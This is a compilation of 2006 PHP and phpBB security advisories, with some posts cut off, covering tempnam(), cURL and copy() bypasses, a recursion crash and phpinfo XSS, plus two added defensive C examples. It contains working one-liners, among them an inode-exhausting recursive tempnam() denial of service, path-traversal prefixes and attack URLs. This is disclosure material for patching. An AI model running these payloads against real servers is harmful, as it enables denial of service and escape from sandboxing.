In PHP 5.1.4 there exists a bug that allows you to create a file with any name.

---
cxib# php -r 'echo tempnam("/www/temp/", "hacker.php")."\n";'
/www/temp/hacker.phpGQMqSE
---

You have created the file /www/temp/hacker.phpGQMqSE. "GQMqSE" is automatically added to the filename. The problem exists because the path couldn't be longer than MAXPATHLEN. The standard MAXPATHLEN is 1024B.

-771-805---
PHP_FUNCTION(tempnam)
{
    zval **arg1, **arg2;
    char *d;
    char *opened_path;
    char *p;
    int fd;
    size_t p_len;

    if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) {
        WRONG_PARAM_COUNT;
    }
    convert_to_string_ex(arg1);
    convert_to_string_ex(arg2);

    if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
        RETURN_FALSE;
    }

    d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));

    php_basename(Z_STRVAL_PP(arg2), Z_STRLEN_PP(arg2), NULL, 0, &p, &p_len TSRMLS_CC);
    if (p_len > 64) {
        p[63] = '\0';
    }

    if ((fd = php_open_temporary_fd(d, p, &opened_path TSRMLS_CC)) >= 0) {
        close(fd);
        RETVAL_STRING(opened_path, 0);
    } else {
        RETVAL_FALSE;
    }
    efree(p);
    efree(d);
}
-771-805---

So if you create a path like /www/../www/.. etc. with arg1+arg2=1023, the uniqueid is not added to the path.

Example:

---
cxib# php -r 'echo tempnam("/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/temp/", "hacker.php")."\n";'
/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/temp/hacker.php
---
= /www/temp/hacker.php
---
cxib# ls -la /www/temp/hacker*
-rw-------  1 cxib  cxib  0 May 22 23:33 /www/temp/hacker.php
-rw-------  1 cxib  cxib  0 May 22 23:26 /www/temp/hacker.phpGQMqSE
---

--- 2. How to fix ---

CVS h
[Full-disclosure] cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4
Source: http://securityreason.com/achievement_securityalert/39

[cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 15.5.2006
- Public: 27.5.2006
from SECURITYREASON.COM
CVE-2006-2563

--- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sather Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now.

PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication. These functions have been added in PHP 4.0.2.

--- 1. Safe Mode Bypass in cURL ---

A general problem exists in the cURL functions, because when safe_mode is on, 0 (\x00) characters in strings are changed to "_". The next bug exists in the prefix file://, because safe_mode checks only the path after file:///.

Example:

-Safe_Mode bypass exploit.1---
-Safe_Mode bypass exploit.1---

Safe_mode checks access only to __FILE__. But cURL includes filethatyoudonthaveaccessto.php. So you can include any files from the directory where the script is. But in this exploit, you can only read files from the directory where this script is. You can't use "/". There is another conception for an exploit: if you have access (rights) to a directory where you want to read files. So, if you want to include files from "/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php", you should make a dir like "/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/":

-Safe_Mode bypass exploit.2---
-Safe_Mode bypass exploit.2---

Safe mode checks access to the file "file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/../../../../../../YourFile.php" and cURL includes only "file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php" because \x00 ends the path to the file.

--- 2. How to fix ---

CVS http://cvs.php.net/viewcvs.cgi/php-src/ext/curl/

--- 3. Greets ---

For: sp3x and p_e_a, l5x, Infospec, pi3, eax

--- 4. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

SecurityReason.Com
[Full-disclosure] phpBB 2.0.20 Full Path Disclosure and SQL Errors
Source: http://securityreason.com/achievement_securityalert/38

[phpBB 2.0.20 Full Path Disclosure and SQL Errors]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 1.5.2006
- Public: 5.5.2006
from SecurityReason.Com
CVE:
- CVE-2006-2219 Full Path Disclosure
- CVE-2006-2220 Sql Errors

--- 0.Description ---

phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

Contact with author http://www.phpbb.com/about.php.

--- 1. Full Path Disclosure ---

Many scripts, for example phpBB, have a basic bug. It exists in variables which are being inserted into the script, into specific functions. For example the function htmlspecialchars():

...
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, &quote_style, &hint_charset, &hint_charset_len) == FAILURE) {
    return;
}
...

As you can see there is protection against the formatting of the input variable. If the variable is other than string, we get an error with Full Path Disclosure.

Example:
http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx

---Code ---
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
    $mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) : htmlspecialchars($HTTP_GET_VARS['mode']);
}
else
{
    $mode = 'joined';
}
---Code ---

---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php on line 40

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486
---Result ---

http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx

---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 487

Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 498

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486
---Result ---

The problem appears if display_errors==1, but it exists on many websites (even at php.net).

--- 2. Sql Errors ---

The problem appears because we can add anything (INT) to the end of the SQL query (LIMIT). The query will fail if the value is below 0 or above -2^32.

Example:
http://[HOST]/2020/phpBB2/memberlist.php?start=-1

---Code ---
$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;
---Code ---

---Result ---
Could not query users

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 50' at line 4

SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50

Line : 151
File : memberlist.php
---Result ---

--- 3. How to fix ---

Turn off display_errors or use a function like is_string().

--- 4. Greets ---

sp3x Infospec, p_e_a, krasza, revival, l5x

--- 5. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

SecurityReason.Com
[Full-disclosure] copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2
Source: http://securityreason.com/achievement_securityalert/37

[copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 2.4.2006
- Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1608

--- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now.

--- 1. Safe Mode Bypass ---

A general problem exists in the safe mode function, because safe mode accepts paths like "compress.zlib://".

PHP442 File "main/safe_mode.c"
-78-80---
wrapper = php_stream_locate_url_wrapper(filename, NULL, STREAM_LOCATE_WRAPPERS_ONLY TSRMLS_CC);
if (wrapper != NULL)
    return 1;
-78-80---

If php_stream_locate_url_wrapper() returns something.. safe mode is going to stop. Let's see the function php_stream_locate_url_wrapper().

PHP442 File "main/streams.c"
-2522-2588---
PHPAPI php_stream_wrapper *php_stream_locate_url_wrapper(const char *path, char **path_for_open, int options TSRMLS_DC)
{
    HashTable *wrapper_hash = (FG(stream_wrappers) ? FG(stream_wrappers) : &url_stream_wrappers_hash);
    php_stream_wrapper *wrapper = NULL;
    const char *p, *protocol = NULL;
    int n = 0;

    if (path_for_open)
        *path_for_open = (char*)path;

    if (options & IGNORE_URL)
        return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : &php_plain_files_wrapper;

    for (p = path; isalnum((int)*p) || *p == '+' || *p == '-' || *p == '.'; p++) {
        n++;
    }

    if ((*p == ':') && (n > 1) && !strncmp("://", p, 3)) {
        protocol = path;
    } else if (strncasecmp(path, "zlib:", 5) == 0) {
        /* BC with older php scripts and zlib wrapper */
        protocol = "compress.zlib";
        n = 13;
        if (options & REPORT_ERRORS) {
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "Use of \"zlib:\" wrapper is deprecated; please use \"compress.zlib://\" instead.");
        }
    }

    if (protocol) {
        if (FAILURE == zend_hash_find(wrapper_hash, (char*)protocol, n, (void**)&wrapper)) {
            char wrapper_name[32];

            if (options & REPORT_ERRORS) {
                if (n >= sizeof(wrapper_name))
                    n = sizeof(wrapper_name) - 1;
                PHP_STRLCPY(wrapper_name, protocol, sizeof(wrapper_name), n);
                php_error_docref(NULL TSRMLS_CC, E_NOTICE, "Unable to find the wrapper \"%s\" - did you forget to enable it when you configured PHP?", wrapper_name);
            }
            wrapper = NULL;
            protocol = NULL;
        }
    }

    /* TODO: curl based streams probably support file:// properly */
    if (!protocol || !strncasecmp(protocol, "file", n)) {
        if (protocol && path[n+1] == '/' && path[n+2] == '/') {
            if (options & REPORT_ERRORS)
                php_error_docref(NULL TSRMLS_CC, E_WARNING, "remote host file access not supported, %s", path);
            return NULL;
        }
        if (protocol && path_for_open)
            *path_for_open = (char*)path + n + 1;

        /* fall back on regular file access */
        return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : &php_plain_files_wrapper;
    }

    if (wrapper && wrapper->is_url && !PG(allow_url_fopen)) {
        if (options & REPORT_ERRORS)
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL file-access is disabled in the server configuration");
        return NULL;
    }
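The posts above share one root cause: the safe_mode/open_basedir check looks at different bytes than the code that later opens the file (a stream-wrapper prefix stripped after the check, an embedded \0 that ends the C string early, a ".." sequence resolved only at open time). The following is an added example written for this page, not PHP's implementation and not code from the advisories: a C path-containment check that runs on the length-counted input, refuses embedded NULs and wrapper prefixes before doing anything else, and compares a lexically normalised path against the base directory. The names path_within_basedir, the PATH_* verdicts and MAX_PATH_LEN are my own; the normalisation is purely lexical, so a production version would also resolve symlinks with realpath(3) before the comparison.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_PATH_LEN 1024   /* same bound as the MAXPATHLEN the advisories mention */

/* Why a path was refused. */
enum path_verdict {
    PATH_OK = 0,
    PATH_EMBEDDED_NUL,      /* length-counted string contains '\0' */
    PATH_IS_URL,            /* "scheme:" / "scheme://" stream-wrapper prefix */
    PATH_NOT_ABSOLUTE,
    PATH_TOO_LONG,
    PATH_ESCAPES_BASEDIR
};

/* Same shape as PHP's wrapper detection: a run of [A-Za-z0-9+.-] followed by ':'. */
static int looks_like_url(const char *p)
{
    size_t n = 0;
    while (isalnum((unsigned char)p[n]) || p[n] == '+' || p[n] == '-' || p[n] == '.')
        n++;
    return n > 0 && p[n] == ':';
}

/* Lexically normalise an absolute path: collapse "//", drop ".", resolve "..",
   never climbing above "/". Returns -1 if the result does not fit in out. */
static int normalize_path(const char *in, char *out, size_t outsz)
{
    size_t olen = 0;
    const char *p = in;

    if (*p != '/' || outsz < 2) return -1;
    out[olen++] = '/';
    while (*p) {
        while (*p == '/') p++;                /* skip separator runs */
        if (!*p) break;
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t seglen = (size_t)(p - seg);
        if (seglen == 1 && seg[0] == '.') continue;
        if (seglen == 2 && seg[0] == '.' && seg[1] == '.') {
            if (olen > 1) {                   /* pop the previous segment */
                olen--;
                while (olen > 0 && out[olen - 1] != '/') olen--;
            }
            continue;
        }
        if (olen + seglen + 1 >= outsz) return -1;
        memcpy(out + olen, seg, seglen);
        olen += seglen;
        out[olen++] = '/';
    }
    if (olen > 1) olen--;                     /* drop trailing '/' except for "/" */
    out[olen] = '\0';
    return 0;
}

/* The check a consumer of a user-supplied path should run on the *same bytes* it
   will later open. path_len is the length-counted size (PHP-style string), so an
   embedded NUL cannot hide a second path from the check. */
enum path_verdict path_within_basedir(const char *path, size_t path_len, const char *basedir)
{
    char tmp[MAX_PATH_LEN], resolved[MAX_PATH_LEN], base[MAX_PATH_LEN];
    size_t blen;

    if (path_len >= sizeof tmp) return PATH_TOO_LONG;
    if (memchr(path, '\0', path_len) != NULL) return PATH_EMBEDDED_NUL;
    memcpy(tmp, path, path_len);
    tmp[path_len] = '\0';
    if (looks_like_url(tmp)) return PATH_IS_URL;          /* php://, compress.zlib://, file:// */
    if (tmp[0] != '/') return PATH_NOT_ABSOLUTE;
    if (normalize_path(tmp, resolved, sizeof resolved) != 0) return PATH_TOO_LONG;
    if (normalize_path(basedir, base, sizeof base) != 0) return PATH_TOO_LONG;
    blen = strlen(base);
    if (strncmp(resolved, base, blen) != 0) return PATH_ESCAPES_BASEDIR;
    /* "/www" must not match "/wwwx": the next byte has to be '/' or the end */
    if (blen > 1 && resolved[blen] != '\0' && resolved[blen] != '/') return PATH_ESCAPES_BASEDIR;
    return PATH_OK;
}

int main(void)
{
    /* Constructed inputs in the shape of the strings from the advisories. */
    static const struct { const char *p; size_t n; } cases[] = {
        { "/www/cxib/temps", 15 },
        { "/www/../etc/passwd", 18 },
        { "php://../../www/temp", 20 },
        { "compress.zlib:///etc/passwd", 27 },
        { "/inne\0;/www", 11 },               /* the session.save_path "\0;" trick */
    };
    static const char *names[] = { "ok", "embedded NUL", "wrapper URL",
                                   "not absolute", "too long", "escapes basedir" };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("%-30s -> %s\n", cases[i].p,
               names[path_within_basedir(cases[i].p, cases[i].n, "/www")]);
    return 0;
}
```

The order of the tests is the design point: the NUL and wrapper checks come before normalisation, so that no later step can see a shorter or differently prefixed string than the one that was validated.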
[Full-disclosure] tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2
Source: http://securityreason.com/achievement_securityalert/36

[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 26.3.2006
- Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494

--- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

tempnam -- Create file with unique file name

--- 1. tempnam() open_basedir bypass ---

In function tempnam() 2 args are required.

http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )

So, if we have open_basedir set to /home, we can't create a file outside the /home directory.

In ext/standard/file.c (PHP 4.4.2)
-550-578---
PHP_FUNCTION(tempnam)
{
    pval **arg1, **arg2;
    char *d;
    char *opened_path;
    char p[64];
    FILE *fp;

    if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) {
        WRONG_PARAM_COUNT;
    }
    convert_to_string_ex(arg1);
    convert_to_string_ex(arg2);

    if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
        RETURN_FALSE;
    }

    d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
    strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));

    if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
        fclose(fp);
        RETVAL_STRING(opened_path, 0);
    } else {
        RETVAL_FALSE;
    }
    efree(d);
}
-550-578---

if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
    RETURN_FALSE;
}

Where is arg2? So we can write an exploit like:

tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd");
tempnam("/home", "../../../../../../tmp/cx");
etc.

It is a low issue but you can try to create a lot of files and overload the inodes of the HD. I have one partition, /var:

/dev/ad0s1e    1.0G     97M    858M    10%    /var   <- Space (B)
/dev/ad0s1e 1012974 94472 837466 10% 3796 137514 3% /var   <- INODES

where mysql and apache try to create some files. When we overload the free inodes, the system has big problems with apache, mysql.

Example:

cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx"); cx(); } cx();'
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
... etc
/usr/local/libexec/mysqld: Can't create/write to file '/var/tmp/ibBIsZ6o' (Errcode: 13)

And mysql die()!

--- 2. How to fix ---

CVS http://cvs.php.net/viewcvs.cgi/php-src/NEWS

--- 3. Greets ---

For: sp3x and p_e_a, pi3, eax, Infospec ;]

--- 4. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

SecurityReason.Com
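Two tempnam() posts on this page describe the same routine failing in two ways: the prefix argument is not reduced to a file name, so "../" in it walks out of the checked directory (this post), and when directory plus prefix approach MAXPATHLEN the unique suffix is silently dropped, so the resulting name is predictable (the PHP 5.1.4 post above). The following is an added example written for this page, not PHP's code and not from the advisories: a C routine that builds a temporary-file template the way a hardened tempnam() should. The prefix is reduced to its basename and capped at 63 bytes (the limit the fixed PHP code uses), the request is refused outright when directory + prefix + six-character suffix would not fit in MAX_PATH_LEN, and the file itself is created atomically with mkstemp(3). The function names, MAX_PATH_LEN and the repeated_dir helper (which only manufactures long directory strings for the demo) are my own.

```c
#define _POSIX_C_SOURCE 200809L   /* for mkstemp(3) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define MAX_PATH_LEN   1024   /* mirrors the MAXPATHLEN the advisory mentions */
#define MAX_PREFIX_LEN 63     /* the fixed PHP code keeps at most 63 prefix bytes */
#define SUFFIX_LEN     6      /* the "XXXXXX" that mkstemp(3) replaces */

/* Last path component of prefix: "../../tmp/cx" -> "cx". A prefix is only a
   file-name fragment, so any directory part in it is discarded, not honoured. */
const char *prefix_basename(const char *prefix)
{
    const char *slash = strrchr(prefix, '/');
    return slash ? slash + 1 : prefix;
}

/* Build "dir/prefixXXXXXX" into a static buffer and return it, or NULL when the
   directory is not absolute or the result would not fit in MAX_PATH_LEN. Failing
   closed is the point: the unique suffix is never dropped to make a name fit. */
const char *build_temp_template(const char *dir, const char *prefix)
{
    static char tmpl[MAX_PATH_LEN];
    const char *base = prefix_basename(prefix);
    size_t dlen = strlen(dir);
    size_t plen = strlen(base);
    size_t pos, total;
    int need_slash;

    if (dlen == 0 || dir[0] != '/') return NULL;      /* require an absolute directory */
    if (plen > MAX_PREFIX_LEN) plen = MAX_PREFIX_LEN;
    need_slash = dir[dlen - 1] != '/';
    total = dlen + (need_slash ? 1 : 0) + plen + SUFFIX_LEN;
    if (total >= sizeof tmpl) return NULL;            /* no room for name + '\0' */

    memcpy(tmpl, dir, dlen);
    pos = dlen;
    if (need_slash) tmpl[pos++] = '/';
    memcpy(tmpl + pos, base, plen);
    pos += plen;
    memcpy(tmpl + pos, "XXXXXX", SUFFIX_LEN);
    pos += SUFFIX_LEN;
    tmpl[pos] = '\0';
    return tmpl;
}

/* Demo helper: an absolute directory string of the requested length, "/aaaa...". */
const char *repeated_dir(size_t len)
{
    static char buf[MAX_PATH_LEN + 16];
    if (len >= sizeof buf) len = sizeof buf - 1;
    memset(buf, 'a', len);
    buf[0] = '/';
    buf[len] = '\0';
    return buf;
}

/* Create the file atomically with mkstemp(3); returns the fd, or -1 on refusal. */
int create_temp_file(const char *dir, const char *prefix, char *created, size_t created_sz)
{
    const char *tmpl = build_temp_template(dir, prefix);
    if (!tmpl || strlen(tmpl) >= created_sz) return -1;
    strcpy(created, tmpl);                /* mkstemp needs a writable copy */
    return mkstemp(created);
}

int main(void)
{
    char created[MAX_PATH_LEN];
    const char *t;

    /* Constructed inputs in the shape of the advisories' calls. */
    t = build_temp_template("/www/temp/", "hacker.php");
    printf("plain prefix      -> %s\n", t ? t : "(refused)");
    t = build_temp_template("/www", "../../../../../../var/tmp/cx");
    printf("traversal prefix  -> %s\n", t ? t : "(refused)");
    t = build_temp_template(repeated_dir(1010), "hacker.php");
    printf("1010-byte dir     -> %s\n", t ? t : "(refused: would exceed MAX_PATH_LEN)");

    int fd = create_temp_file("/tmp", "demo", created, sizeof created);
    if (fd >= 0) {
        printf("created %s\n", created);
        close(fd);
        unlink(created);
    }
    return 0;
}
```

The length check happens before any byte is copied, and the refusal is a NULL return rather than a shorter name, which is the behaviour the PHP 5.1.4 post shows missing.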
[Full-disclosure] function *() php/apache Crash PHP 4.4.2 and 5.1.2
Source: http://securityreason.com/achievement_securityalert/35

[function *() php/apache Crash PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 21.3.2006
- Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1549

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

--- 1. function *() Crash ---

PHP4/5 is vulnerable to a local denial of service. The general problem is in allocating data to memory. For example, attack:

cxib# php -r 'function cx(){ cx(); } cx();'
Segmentation fault (core dumped)
cxib#

Segfault.. let`s see what we have in gdb

---
cxib# cat /www/functionsegfault.php
cxib# gdb -q php
(gdb) r '/www/functionsegfault.php'
Starting program: /usr/local/bin/php '/www/functionsegfault.php'

Program received signal SIGSEGV, Segmentation fault.
0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, __zend_filename=0x811d8c0 "/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c", __zend_lineno=1568) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111
111     /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c: No such file or directory.
        in /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c
(gdb) bt
#0  0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, __zend_filename=0x811d8c0 "/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c", __zend_lineno=1568) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111
#1  0x080f042a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1568
#2  0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#3  0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#4  0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#5  0x080f019a in execute (op_array=0x81b3880)
...
---

or in the apache error_log:

[Mon Mar 20 12:12:54 2006] [notice] child pid 744 exit signal Illegal instruction (4)

--- 2. Greets ---

For: sp3x and p_e_a, pi3, eax, Infospec ;]

--- 3. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
[Full-disclosure] phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2
Source: http://securityreason.com/achievement_securityalert/34

[phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 26.2.2006
- Public: 8.4.2006
from SecurityReason.Com
CVE-2006-0996

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

--- 1. Cross Site Scripting ---

In phpinfo() you can see all variables, like:

file: standard/info.c

-630-636---
    php_print_gpcse_array("_REQUEST", sizeof("_REQUEST")-1 TSRMLS_CC);
    php_print_gpcse_array("_GET", sizeof("_GET")-1 TSRMLS_CC);
    php_print_gpcse_array("_POST", sizeof("_POST")-1 TSRMLS_CC);
    php_print_gpcse_array("_FILES", sizeof("_FILES")-1 TSRMLS_CC);
    php_print_gpcse_array("_COOKIE", sizeof("_COOKIE")-1 TSRMLS_CC);
    php_print_gpcse_array("_SERVER", sizeof("_SERVER")-1 TSRMLS_CC);
    php_print_gpcse_array("_ENV", sizeof("_ENV")-1 TSRMLS_CC);
-630-636---

For any array, the function php_print_gpcse_array() checks 4096b of the variable.

file: standard/info.c

-135-154---
    if (Z_TYPE_PP(tmp) == IS_ARRAY) {
        zval *tmp3;
        MAKE_STD_ZVAL(tmp3);
        if (!sapi_module.phpinfo_as_text) {
            PUTS("");
        }
        php_start_ob_buffer(NULL, 4096, 1 TSRMLS_CC);
        zend_print_zval_r(*tmp, 0);
        php_ob_get_buffer(tmp3 TSRMLS_CC);
        php_end_ob_buffer(0, 0 TSRMLS_CC);
        elem_esc = php_info_html_esc(Z_STRVAL_P(tmp3) TSRMLS_CC);
        PUTS(elem_esc);
        efree(elem_esc);
        zval_ptr_dtor(&tmp3);
        if (!sapi_module.phpinfo_as_text) {
            PUTS("");
        }
    } else if (Z_TYPE_PP(tmp) != IS_STRING) {
-135-154---

So if we create an array longer than 4096, the HTML tags won't be removed.

Exploit:

